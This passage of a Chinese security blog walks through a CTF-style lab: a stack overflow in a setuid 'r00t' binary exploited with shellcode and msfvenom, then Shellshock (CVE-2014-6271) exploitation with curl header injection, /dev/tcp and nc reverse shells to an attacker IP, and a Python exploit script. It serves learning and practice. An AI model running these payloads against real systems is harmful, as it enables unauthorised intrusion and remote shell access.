 79AQEKTwAAAAAAAAQEawAAAA1xAAAADiUAAAD/AAABEQElDhMLAw4bDhEBEgEQBgAAAiQACws+CwMO
 80AAADJAALCz4LAwgAAAQPAAsLSRMAAAUmAEkTAAAGLgE/DAMOOgs7CycMSRMRARIBQAYBEwAABwUA
 81Aw46CzsLSRMCCgAACDQAAwg6CzsLSRMCCgAACS4BPwwDDjoLOwsnDEkTPAwBEwAACgUASRMAAAsL
 82AREBEgEAAAwuAT8MAw46CzsLJww8DAAADQEBSRMAAA4hAEkTLwsAAABGAAAAAgAqAAAAAQH7Dg0A
 83AQEBAQAAAAEAAAEAYm9mLmMAAAAAPGJ1aWx0LWluPgAAAAAAAAUCRIQECBS+aAhZvgh1CEsCAgAB
 84AWxvbmcgbG9uZyBpbnQAc3RyY3B5AGxvbmcgbG9uZyB1bnNpZ25lZCBpbnQAdW5zaWduZWQgY2hh
 85cgBtYWluAC9ob21lL25vb2IAR05VIEMgNC42LjMAYXJnYwBzaG9ydCB1bnNpZ25lZCBpbnQAZXhp
 86dABib2YuYwBzaG9ydCBpbnQAYXJndgAAAAAAAQAAAAIAdAQBAAAAAwAAAAIAdAgDAAAAYgAAAAIA
 87dQhiAAAAYwAAAAIAdAQAAAAAAAAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAA
 88Lm5vdGUuQUJJLXRhZwAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0
 89cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRl
 90eHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5q
 91Y3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AC5kZWJ1Z19hcmFu
 92Z2VzAC5kZWJ1Z19pbmZvAC5kZWJ1Z19hYmJyZXYALmRlYnVnX2xpbmUALmRlYnVnX3N0cgAuZGVi
 93dWdfbG9jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAAC
 94AAAAVIEECFQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAAGiBBAhoAQAAIAAAAAAA
 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
127AAADAB4AAAAAAAAAAAAAAAAAAwAfAAAAAAAAAAAAAAAAAAMAIAABAAAAAAAAAAAAAAAEAPH/DAAA
128ABSfBAgAAAAAAQASABoAAAAcnwQIAAAAAAEAEwAoAAAAJJ8ECAAAAAABABQANQAAAMCDBAgAAAAA
129AgANAEsAAAAcoAQIAQAAAAEAGQBaAAAAIKAECAQAAAABABkAaAAAACCEBAgAAAAAAgANAAEAAAAA
130AAAAAAAAAAQA8f90AAAAGJ8ECAAAAAABABIAgQAAAIiGBAgAAAAAAQARAI8AAAAknwQIAAAAAAEA
131FACbAAAAMIUECAAAAAACAA0AsQAAAAAAAAAAAAAABADx/7cAAAAUnwQIAAAAAAAAEgDIAAAAKJ8E
132CAAAAAABABUA0QAAABSfBAgAAAAAAAASAOQAAAD0nwQIAAAAAAEAFwD6AAAAIIUECAIAAAASAA0A
133CgEAACKFBAgAAAAAEgINACEBAAAUoAQIAAAAACAAGAAsAQAAAAAAAAAAAAASAAAAPgEAABygBAgA
134AAAAEADx/0UBAABchQQIAAAAABIADgBLAQAAAAAAAAAAAAASAAAAXQEAACCfBAgAAAAAEQITAGoB
135AAAUoAQIAAAAABAAGAB3AQAAAAAAAAAAAAAgAAAAhgEAAAAAAAAAAAAAEgAAAJYBAAAYoAQIAAAA
136ABECGACjAQAAfIUECAQAAAARAA8AsgEAAAAAAAAAAAAAEgAAAM8BAACwhAQIYQAAABIADQDfAQAA
137JKAECAAAAAAQAPH/5AEAAJCDBAgAAAAAEgANAOsBAAB4hQQIBAAAABEADwDyAQAAHKAECAAAAAAQ
138APH//gEAAESEBAhjAAAAEgANAAMCAAAAAAAAAAAAACAAAAAXAgAA9IIECAAAAAASAAsAAGNydHN0
139dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBfX2RvX2dsb2Jh
140bF9kdG9yc19hdXgAY29tcGxldGVkLjYxNTkAZHRvcl9pZHguNjE2MQBmcmFtZV9kdW1teQBfX0NU
141T1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgA
142Ym9mLmMAX19pbml0X2FycmF5X2VuZABfRFlOQU1JQwBfX2luaXRfYXJyYXlfc3RhcnQAX0dMT0JB
143TF9PRkZTRVRfVEFCTEVfAF9fbGliY19jc3VfZmluaQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AGRh
144dGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2VkYXRhAF9maW5pAHN0cmNweUBAR0xJQkNfMi4w
145AF9fRFRPUl9FTkRfXwBfX2RhdGFfc3RhcnQAX19nbW9uX3N0YXJ0X18AZXhpdEBAR0xJQkNfMi4w
146AF9fZHNvX2hhbmRsZQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4w
147AF9fbGliY19jc3VfaW5pdABfZW5kAF9zdGFydABfZnBfaHcAX19ic3Nfc3RhcnQAbWFpbgBfSnZf
148UmVnaXN0ZXJDbGFzc2VzAF9pbml0AA==

然后再在kali中复制解码得到r00t的脚本内容

1cat |base64 -d > r00t
2chmod +x door3/r00t
3---
4# 复制上面的base64内容，然后回车 ctrl D 结束

然后用gbd调试

1sudo apt install gdb
2gdb r00t 
3disas main

strcpy 的作用：将源字符串复制到目标缓冲区，不检查目标缓冲区长度，可能导致缓冲区溢出（Buffer Overflow）。
漏洞场景：如果目标缓冲区（如栈上的字符数组）较小，而源字符串过长，strcpy 会覆盖栈上的返回地址（或其他关键数据），导致程序崩溃或被控制流劫持。

1kali:
2ls /usr/share/metasploit-framework/tools/exploit
3cp /usr/share/metasploit-framework/tools/exploit/pattern_create.rb ./
4./pattern_create.rb -l 1000
5-----
6(gdb)run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

用以上命令生成偏移较大的值，然后复制到gdb里面run。

找到溢出位置0x6a413969

1cp /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb ./
2./pattern_offset.rb -q 6a413969 -l 1000

得知偏移量是268，以下的door2不是door3，door2要输入一个参数来做偏移量。

1(gdb)
2r $(python -c 'print ("A"*268 + "B"*4)')
3info r

1r $(python -c 'print ("A"*268 + "B"*4+"C"*20)')

到网页https://shell-storm.org/shellcode/index.html 上找execve /bin/sh找到对应版本的payload：https://shell-storm.org/shellcode/files/shellcode-827.html

 1*****************************************************
 2* Linux/x86 execve /bin/sh shellcode 23 bytes *
 3*****************************************************
 4*	 	 Author: Hamza Megahed		 *
 5*****************************************************
 6* Twitter: @Hamza_Mega *
 7*****************************************************
 8* blog: hamza-mega[dot]blogspot[dot]com *
 9*****************************************************
10* E-mail: hamza[dot]megahed[at]gmail[dot]com *
11*****************************************************
12
13xor %eax,%eax
14push %eax
15push $0x68732f2f
16push $0x6e69622f
17mov %esp,%ebx
18push %eax
19push %ebx
20mov %esp,%ecx
21mov $0xb,%al
22int $0x80
23
24********************************
25#include <stdio.h>
26#include <string.h>
27
28char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
29 "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
30
31int main(void)
32{
33fprintf(stdout,"Length: %d\n",strlen(shellcode));
34(*(void(*)()) shellcode)();
35return 0;
36}

所以，构造payload为

1./r00t $(python -c 'print "A"* 268 + "\x80\xfb\xff\xbf" + "\x90" *20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
2cat /root/Proof.txt

搞错了，应该是door2不是door3。

方法二：检查坏字符

在gdb中调试

1r $(python -c 'print("A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')
2x/256x $esp 
3x/256b $esp

\x00本身就是坏字符，\x09 \x0a \x20这三个逐个去掉后找出，完全去掉后就连续了，就没有坏点了，说明坏字符为：x00\x0a\x09\x20

用坏字符生成payload，然后用命令加载即可。

1msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc
2
3./r00t $(python -c 'print ("A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "\xba\xa0\x03\xb5\x23\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x0b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x55\x69\xbe\x7b\x0c\x3c\xa6\x13\x03\xa2\xaf\x03\x33\x0b\xc3\xa3\xc3\x3b\x0c\x56\xaa\xd5\xdb\x75\x7e\xc2\xd4\x79\x7e\x12\xca\x1b\x17\x7c\x3b\xaf\x8f\x80\x14\x1c\xc6\x60\x57\x22")')

这个靶场开始有难度了，涉及到一些内存的知识点。我对这部分知识也不太了解，很多不会的地方我询问了AI，安全学习是一个庞杂的方向，需要触类旁通。

补充知识点：CVE-2014-6271 （Shellshock 漏洞）

漏洞原理

根本原因：Bash 在处理环境变量时，未正确验证以 () { 开头的函数定义字符串，导致后续命令被意外执行。
影响范围：Bash 版本 1.14 ~ 4.3（2014年9月前的版本）。
典型场景：Web服务器（如Apache CGI）、DHCP客户端、SSH守护进程等通过环境变量调用Bash的场景。

漏洞检测

方法 1：本地检测

1env x='() { :;}; echo VULNERABLE' bash -c "echo Testing"

安全输出：无反应或报错。
存在漏洞：输出 VULNERABLE 和 Testing。

方法 2：远程检测（针对Web CGI）

1curl -A "() { :;}; echo VULNERABLE" http://target/cgi-bin/test.cgi

若返回 VULNERABLE，则存在漏洞。

漏洞利用方法

场景 1：通过HTTP请求（Apache CGI）

假设目标服务器存在 /cgi-bin/status.cgi（或其他CGI脚本）：

执行任意命令：

1curl -H "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'" http://target/cgi-bin/status.cgi

通过修改 User-Agent、Cookie 或 Referer 头注入命令。

反弹Shell：

1curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1" http://target/cgi-bin/status.cgi

在攻击机监听端口：

1nc -lvnp 4444

场景 2：DHCP客户端攻击

如果目标作为DHCP客户端且使用受漏洞影响的Bash：

攻击者可伪造DHCP服务器，在分配IP时注入恶意环境变量。

场景 3：SSH强制命令

若目标允许通过SSH公钥认证并配置了强制命令（如 command="example"）：

1ssh -i id_rsa user@target '() { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1'

自动化利用工具

1. Metasploit

1msf6 > use exploit/multi/http/apache_mod_cgi_bash_env
2msf6 > set RHOSTS <目标IP>
3msf6 > set TARGETURI /cgi-bin/status.cgi
4msf6 > set PAYLOAD linux/x86/shell/reverse_tcp
5msf6 > set LHOST <攻击者IP>
6msf6 > exploit

2. Python EXP脚本

1import requests
2
3url = "http://target/cgi-bin/status.cgi"
4headers = {
5"User-Agent": "() { :;}; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 攻击者IP 4444 >/tmp/f'"
6}
7requests.get(url, headers=headers)

补充知识点：缓冲区溢出漏洞

技术背景

strcpy 的作用：将源字符串复制到目标缓冲区，不检查目标缓冲区长度，可能导致缓冲区溢出（Buffer Overflow）。
漏洞场景：如果目标缓冲区（如栈上的字符数组）较小，而源字符串过长，strcpy 会覆盖栈上的返回地址（或其他关键数据），导致程序崩溃或被控制流劫持。

调试中如何观察

查看函数上下文 输入 disas 或 disassemble 反汇编当前函数，观察 strcpy 调用前后的逻辑：

1(gdb) disas main

检查参数传递

在 call strcpy 前，参数通过栈传递（x86架构）或寄存器传递（x86-64架构）。
例如，在 x86 中，参数按从右到左顺序压栈：

1push 源字符串地址 ; 第二个参数（src）
2push 目标缓冲区地址 ; 第一个参数（dest）
3call strcpy

设置断点 在 strcpy 调用前设置断点，观察内存状态：

1(gdb) break *0x0804848b ; 在调用 strcpy 的地址处断点
2(gdb) run ; 运行程序
3(gdb) info registers ; 查看寄存器值（如 ESP、EBP）
4(gdb) x/8wx $esp ; 查看栈内容（x86）

漏洞利用示例

假设目标缓冲区在栈上且无长度检查：

1char buffer[64];
2strcpy(buffer, 用户输入); // 用户输入超过 64 字节会导致溢出

覆盖返回地址 构造输入字符串，覆盖栈上的返回地址为恶意代码地址（如 Shellcode）。
利用工具 使用 Python 或 pwntools 生成 payload：

1payload = b'A' * 64 # 填充缓冲区
2payload += b'BBBB' # 覆盖 EBP
3payload += p32(0xdeadbeef) # 覆盖返回地址

在 GDB 中验证 输入超长字符串，观察程序崩溃时的寄存器值：

1(gdb) run < payload.txt
2Program received signal SIGSEGV, Segmentation fault.
3eip = 0xdeadbeef ; 返回地址被成功覆盖

防御与修复

替换安全函数 使用 strncpy 或 snprintf 替代 strcpy，并明确限制长度：

1strncpy(buffer, src, sizeof(buffer)-1);
2buffer[sizeof(buffer)-1] = '\0';

编译选项 启用栈保护（Stack Canary）和地址随机化（ASLR）：

1gcc -fstack-protector -pie -fPIE -o program program.c

攻击命令结构

1./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "<shellcode>"')

该命令生成的输入字符串分为四部分：

"A"\*268：填充缓冲区到返回地址前的偏移。
"\x80\xfb\xff\xbf"：覆盖栈上的返回地址，指向 NOP雪橇 或 shellcode。
"\x90"\*20：NOP雪橇（滑板指令），提高 shellcode 命中率。
<shellcode>：恶意机器码（如启动 /bin/sh 的代码）。

逐部分详解

**1. 填充字符（“A”*268）**

作用：覆盖从缓冲区起始位置到返回地址之间的空间。
长度计算：通过动态调试（如 GDB）确定缓冲区到返回地址的偏移。假设缓冲区大小为 256 字节，加上保存的 EBP（4 字节），总偏移为 256 + 4 = 260 字节。若实际测试中发现需要 268 字节，可能是栈对齐或其他变量影响。

2. 覆盖返回地址（"\x80\xfb\xff\xbf"）

目标地址：0xbffffb80（小端序，实际字节为 \x80\xfb\xff\xbf）。
含义：
该地址指向栈上的某个位置（可能是 NOP雪橇 或 shellcode 起始处）。
在关闭 ASLR 的系统中，栈地址通常固定（如 0xbffffxxx）。

**3. NOP雪橇（"\x90"*20）**

作用：
\x90 是 NOP（No Operation）指令，执行时不进行任何操作，程序计数器（EIP）会继续向后移动。
增加 NOP雪橇 的长度可提高命中率，即使返回地址略微偏差，仍可能滑入 shellcode。

4. Shellcode

代码内容：

 1xor eax, eax ; \x31\xc0 (清空 eax)
 2push eax ; \x50 (压入字符串终止符 \x00)
 3push 0x68732f2f ; \x68\x2f\x2f\x73\x68 ("//sh")
 4push 0x6e69622f ; \x68\x2f\x62\x69\x6e ("/bin")
 5mov ebx, esp ; \x89\xe3 (ebx 指向 "/bin//sh")
 6push eax ; \x50 (argv[1] = NULL)
 7push ebx ; \x53 (argv[0] 指向 "/bin//sh")
 8mov ecx, esp ; \x89\xe1 (ecx 指向 argv)
 9mov al, 0xb ; \xb0\x0b (syscall 号 11: execve)
10int 0x80 ; \xcd\x80 (触发系统调用)

功能：调用 execve("/bin//sh", argv, NULL)，启动一个交互式 shell。

攻击流程

溢出缓冲区：通过输入字符串覆盖栈上的返回地址。
劫持 EIP：程序返回时跳转到 0xbffffb80（指向 NOP雪橇）。
滑入 Shellcode：CPU 执行 NOP 指令，直到命中 shellcode。
执行恶意代码：shellcode 启动 /bin/sh，攻击者获得 shell 控制权。

依赖条件

栈可执行（DEP 关闭）：现代系统默认启用数据执行保护（DEP），需目标程序编译时关闭该保护（gcc -z execstack）。
ASLR 关闭：地址空间随机化会使得栈地址不可预测，需在测试环境中关闭：

1echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

准确的偏移计算：需通过调试确定填充长度和返回地址位置。

调试验证步骤

确定偏移量：

1# 生成测试字符串
2python -c 'print "A"*268 + "BBBB" + "C"*100' > payload
3# 在 GDB 中运行
4gdb ./r00t
5(gdb) run < payload
6# 观察崩溃时 EIP 是否为 0x42424242（"BBBB"）

定位 Shellcode 地址：

1(gdb) run < <(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "shellcode"')
2(gdb) x/32wx $esp # 查看栈内容，确认 NOP 和 shellcode 位置

防御措施

启用 DEP/XN 位：阻止栈上代码执行。
启用 ASLR：随机化内存布局。
使用安全函数：替换 strcpy 为 strncpy 或 snprintf。
栈保护（Stack Canary）：检测缓冲区溢出

补充知识点：坏字符

在缓冲区溢出攻击的调试过程中，你提供的命令用于检查内存布局和验证攻击载荷（payload）是否正确覆盖目标区域。以下是详细解析：

1. 构造的 Payload 分析

1(gdb)
2r $(python -c 'print("A"*268 + "B"*4 + "\x01\x02\x03\x04...\xff")')

"A"\*268：填充到返回地址前的偏移（假设覆盖返回地址需要 268 字节）。
"B"\*4：覆盖返回地址的测试值（0x42424242，即 ASCII “BBBB”）。
\x01\x02\x03...\xff：覆盖返回地址后的内存区域，包含所有可能的单字节值（0x01~0xff）。

2. `x/256x $esp` 和 `x/256b $esp` 的作用

这两个 GDB 命令用于检查内存内容，但输出格式不同：

(1) `x/256x $esp`

作用：以 十六进制四字节字（word） 显示栈顶（$esp 指向的地址）开始的 256 个 word（即 256×4=1024 字节）。
快速查看大范围内存布局（如返回地址、栈帧结构）。
确认 "B"*4（0x42424242）是否覆盖到预期的返回地址位置。
观察后续数据（\x01\x02\x03...）是否连续写入内存。

(2) `x/256b $esp`

作用：以 单字节（byte） 显示栈顶开始的 256 个字节。
精确检查每个字节的值，识别坏字符（Bad Characters）。
验证输入数据是否被篡改（如某些字符被过滤或截断）。
确认内存中的字节顺序（是否与输入顺序一致）。

3. 关键检查项

(1) 验证返回地址覆盖

在x/256x $esp的输出中，搜索``0x42424242`。
如果找到，说明 "B"*4 成功覆盖返回地址。
如果未找到，需重新计算偏移量（调整 "A"*268 的长度）。

(2) 检测坏字符

坏字符（Bad Characters）：某些字节（如 \x00、\x0a、\x0d）可能导致输入被截断或程序崩溃。
检查方法：

在 x/256b $esp 的输出中，从 0x01 开始逐字节对比输入和内存中的值。
若某个字节在内存中缺失或值改变（如 0x09 变为 0x20），则该字节为坏字符。
在构造 Shellcode 时需避免使用坏字符。

(3) 观察内存连续性

确认输入数据（\x01\x02\x03...）是否完整且顺序正确。
如果发现数据断裂或顺序错乱，可能因栈溢出破坏其他变量或指针。

4. 示例输出分析

假设执行 x/16x $esp 输出：

10xbffffb80: 0x41414141 0x41414141 0x41414141 0x42424242
20xbffffb90: 0x03020100 0x07060504 0x0b0a0908 0x0f0e0d0c
3...

覆盖验证：地址 0xbffffb8c 处值为 0x42424242，说明返回地址被正确覆盖。
数据连续性：后续数据 0x03020100 对应输入 \x00\x01\x02\x03（注意小端序）。

若执行 x/16b $esp 输出：

10xbffffb80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
20xbffffb88: 0x41 0x41 0x41 0x41 0x42 0x42 0x42 0x42
3...

字节验证：输入 "A"（0x41）和 "B"（0x42）正确写入内存。

5. 渗透测试中的应用

偏移量校准：通过多次运行和观察内存，调整 "A"*N 的长度，确保返回地址精准覆盖。
坏字符列表生成：记录所有被篡改的字节，构建 BadChars = \x00\x09\x0a...。
Shellcode 适配：使用编码器（如msfvenom）生成不含坏字符的 Shellcode：

1msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a' -f python

总结

x/256x $esp：用于快速观察内存布局，验证大范围数据覆盖。
x/256b $esp：用于精细检查字节级数据，识别坏字符和输入篡改。
在渗透测试中，这两个命令是调试缓冲区溢出漏洞的 核心工具，帮助确认攻击载荷的有效性和可靠性。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day14 Kali的Bash脚本

Fri, 16 May 2025 16:24:22 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Bash脚本基础

新建一个hello-world.sh文件，写入以下内容：

1#!/bin/bash
2#Hello world Bash Script
3echo "hello world!"

然后给脚本添加执行权限后运行

1chmod +x hello-world.sh 
2./hello-world.sh

变量

1s1=hello
2s2=world
3s3="I am Hacker"
4echo $s2 $s2 $s3

参数里面套命令，推荐用$()的用法，` 是过时的用法。

1user1=$(whoami) && user2=`whoami`
